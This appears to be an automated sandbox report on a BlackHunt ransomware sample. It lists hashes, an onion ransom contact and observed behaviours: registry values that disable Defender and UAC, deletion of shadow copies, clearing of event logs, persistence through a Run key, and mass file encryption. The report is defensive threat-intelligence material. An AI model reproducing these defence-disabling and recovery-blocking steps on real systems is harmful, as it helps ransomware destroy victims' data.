Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:54
Static task
static1
Behavioral task
behavioral1
Sample
7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe
Resource
win10v2004-20231215-en
General
-
Target
7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe
-
Size
707KB
-
MD5
d11ddde4617c0cc05ce8a950ec9560be
-
SHA1
b0480f6b08c1d821d8c589ca41345a12b0b4db0d
-
SHA256
7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0
-
SHA512
da5610b43d210ee5c108a13b8d60d6b95ff339888f03a1aeaad93eb60f513e68d6303b5654e18acecd6d6c3a9acca307bf3a8df40059cad7772e5aaf939369d2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V88vnh:6uaTmkZJ+naie5OTamgEoKxLWYih
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2804 fsutil.exe 2988 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1588 wevtutil.exe 2608 wevtutil.exe 2032 wevtutil.exe 2436 wevtutil.exe 1304 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2720 bcdedit.exe 2860 bcdedit.exe 2708 bcdedit.exe 824 bcdedit.exe -
Renames multiple (2876) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2012 wbadmin.exe 2996 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1764 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" bcdedit.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\Z: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\H: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\L: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\X: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\F: vds.exe File opened (read-only) \??\J: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\T: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\I: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\P: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\A: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\S: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\G: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\M: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\Q: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\R: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\Y: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\U: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\O: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\V: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\N: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened (read-only) \??\K: 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#BlackHunt_ReadMe.hta 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#BlackHunt_ReadMe.hta 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files (x86)\MSBuild\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\UnregisterMove.docx 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_ReadMe.hta 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.hta 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2760 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2092 vssadmin.exe 2908 vssadmin.exe 472 vssadmin.exe 1152 vssadmin.exe 2840 vssadmin.exe 2168 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2300 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" schtasks.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2188 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2980 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeRestorePrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeBackupPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeTakeOwnershipPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeAuditPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeSecurityPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeIncBasePriorityPrivilege 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Token: SeBackupPrivilege 2356 vssvc.exe Token: SeRestorePrivilege 2356 vssvc.exe Token: SeAuditPrivilege 2356 vssvc.exe Token: SeBackupPrivilege 2936 wbengine.exe Token: SeRestorePrivilege 2936 wbengine.exe Token: SeSecurityPrivilege 2936 wbengine.exe Token: SeSecurityPrivilege 2032 wevtutil.exe Token: SeBackupPrivilege 2032 wevtutil.exe Token: SeSecurityPrivilege 2436 wevtutil.exe Token: SeBackupPrivilege 2436 wevtutil.exe Token: SeSecurityPrivilege 1588 wevtutil.exe Token: SeBackupPrivilege 1588 wevtutil.exe Token: SeSecurityPrivilege 2608 wevtutil.exe Token: SeBackupPrivilege 2608 wevtutil.exe Token: SeSecurityPrivilege 1304 wevtutil.exe Token: SeBackupPrivilege 1304 wevtutil.exe Token: SeDebugPrivilege 2300 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2516 wrote to memory of 2784 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 30 PID 2516 wrote to memory of 2784 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 30 PID 2516 wrote to memory of 2784 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 30 PID 2516 wrote to memory of 2784 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 30 PID 2516 wrote to memory of 1740 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 47 PID 2516 wrote to memory of 1740 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 47 PID 2516 wrote to memory of 1740 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 47 PID 2516 wrote to memory of 1740 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 47 PID 2784 wrote to memory of 2740 2784 cmd.exe 35 PID 2784 wrote to memory of 2740 2784 cmd.exe 35 PID 2784 wrote to memory of 2740 2784 cmd.exe 35 PID 2516 wrote to memory of 2280 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 32 PID 2516 wrote to memory of 2280 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 32 PID 2516 wrote to memory of 2280 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 32 PID 2516 wrote to memory of 2280 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 32 PID 1740 wrote to memory of 2800 1740 cmd.exe 33 PID 1740 wrote to memory of 2800 1740 cmd.exe 33 PID 1740 wrote to memory of 2800 1740 cmd.exe 33 PID 2516 wrote to memory of 2804 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 150 PID 2516 wrote to memory of 2804 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 150 PID 2516 wrote to memory of 2804 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 150 PID 2516 wrote to memory of 2804 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 150 PID 2516 wrote to memory of 2828 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 37 PID 2516 wrote to memory of 2828 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 37 PID 2516 wrote to memory of 2828 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 37 PID 2516 wrote to memory of 2828 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 37 PID 2516 wrote to memory of 2728 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 41 PID 2516 wrote to memory of 2728 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 41 PID 2516 wrote to memory of 2728 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 41 PID 2516 wrote to memory of 2728 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 41 PID 2516 wrote to memory of 2140 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 40 PID 2516 wrote to memory of 2140 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 40 PID 2516 wrote to memory of 2140 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 40 PID 2516 wrote to memory of 2140 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 40 PID 2804 wrote to memory of 2760 2804 fsutil.exe 134 PID 2804 wrote to memory of 2760 2804 fsutil.exe 134 PID 2804 wrote to memory of 2760 2804 fsutil.exe 134 PID 2516 wrote to memory of 2632 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 45 PID 2516 wrote to memory of 2632 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 45 PID 2516 wrote to memory of 2632 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 45 PID 2516 wrote to memory of 2632 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 45 PID 2280 wrote to memory of 2788 2280 cmd.exe 48 PID 2280 wrote to memory of 2788 2280 cmd.exe 48 PID 2280 wrote to memory of 2788 2280 cmd.exe 48 PID 2516 wrote to memory of 2620 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 49 PID 2516 wrote to memory of 2620 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 49 PID 2516 wrote to memory of 2620 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 49 PID 2516 wrote to memory of 2620 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 49 PID 2516 wrote to memory of 2100 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 51 PID 2516 wrote to memory of 2100 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 51 PID 2516 